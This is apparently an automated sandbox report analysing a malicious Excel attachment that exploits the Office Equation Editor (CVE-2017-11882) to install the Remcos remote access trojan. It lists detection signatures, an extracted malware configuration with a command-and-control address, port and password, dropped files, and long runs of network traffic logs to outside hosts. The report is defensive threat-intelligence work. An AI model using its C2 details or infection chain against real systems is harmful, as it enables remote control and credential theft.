Windows Analysis Report
PO-00006799868.xls

Overview

General Information

Sample name: PO-00006799868.xls
Analysis ID: 1532154
MD5: e78662c0ecb1a705f3f16366cff45409
SHA1: 0de40063c9028a33b77d4cb3de06dec0f705059b
SHA256: 33c790e2db3f22fbd80c43a82837b5fb7a0f4a317b25dbab1e984baf95fa82bc
Tags: xlsuser-abuse_ch
Infos:

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Remcos
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Document exploit detected (process start blacklist hit)
Drops VBS files to the startup folder
Excel sheet contains many unusual embedded objects
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Office drops RTF file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Searches for Windows Mail specific files
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Keylogger Generic
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Remcos, RemcosRAT Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
 https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

AV Detection
barindex
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{8ACACCBE-F49B-438C-81AF-59EF5D64236E}.tmp Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
Found malware configuration
Source: 0000000C.00000002.1055307081.0000000000734000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": "107.173.4.16:2404:1", "Assigned name": "newest", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-FI789R", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Multi AV Scanner detection for submitted file
Source: PO-00006799868.xls ReversingLabs: Detection: 13%
Source: PO-00006799868.xls Virustotal: Detection: 14% Perma Link
Yara detected Remcos RAT
Source: Yara match File source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.name.exe.10a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.name.exe.10b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.name.exe.10b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.name.exe.10a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.485970456.0000000000604000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.1055307081.0000000000734000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: name.exe PID: 3328, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 3316, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: name.exe PID: 3000, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 2176, type: MEMORYSTR
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\directory\name.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\taskhostw[1].exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: PO-00006799868.xls Joe Sandbox ML: detected
Source: name.exe, 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_2c49e6e3-a

Exploits
barindex
Yara detected UAC Bypass using CMSTP
Source: Yara match File source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.name.exe.10a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.name.exe.10b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.name.exe.10b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.name.exe.10a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: name.exe PID: 3328, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 3316, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: name.exe PID: 3000, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 2176, type: MEMORYSTR
Office equation editor establishes network connection
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Network connect: IP: 104.168.7.25 Port: 80 Jump to behavior
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\taskhostw.exe Jump to behavior
Document contains Microsoft Equation 3.0 OLE entries
Source: ~WRF{8ACACCBE-F49B-438C-81AF-59EF5D64236E}.tmp.4.dr Stream path '_1790234746/\x1CompObj' : ...................F....Microsoft Equation 3.0....
Source: ~WRF{8ACACCBE-F49B-438C-81AF-59EF5D64236E}.tmp.4.dr Stream path '_1790234751/\x1CompObj' : ...................F....Microsoft Equation 3.0....
Office Equation Editor has been started
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49164 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49165 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49163 version: TLS 1.2
Source: Binary string: wntdll.pdb source: name.exe, 0000000B.00000003.456762758.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000B.00000003.456458647.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000011.00000003.485897066.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000011.00000003.485739921.0000000002BE0000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_0021449B GetFileAttributesW,FindFirstFileW,FindClose, 10_2_0021449B
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_0021C75D FindFirstFileW,FindClose, 10_2_0021C75D
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_0021C7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 10_2_0021C7E8
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_012C449B GetFileAttributesW,FindFirstFileW,FindClose, 11_2_012C449B
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_012CC75D FindFirstFileW,FindClose, 11_2_012CC75D
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_012CC7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 11_2_012CC7E8
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_012CF17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 11_2_012CF17E
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_012CF021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 11_2_012CF021
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_012CF47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 11_2_012CF47F
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_012C3833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 11_2_012C3833
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_012C3B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 11_2_012C3B56
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_012CBD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 11_2_012CBD48
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Windows\SysWOW64\config\systemprofile\ Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\ Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\ Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\ Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\ Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ Jump to behavior

Software Vulnerabilities
barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: shuvi.io
Source: global traffic DNS query: name: shuvi.io
Source: global traffic DNS query: name: shuvi.io
Source: global traffic DNS query: name: shuvi.io
Source: global traffic DNS query: name: shuvi.io
Source: global traffic DNS query: name: shuvi.io
Source: global traffic DNS query: name: shuvi.io
Source: global traffic DNS query: name: shuvi.io
Source: global traffic DNS query: name: geoplugin.net
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 178.237.33.50:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
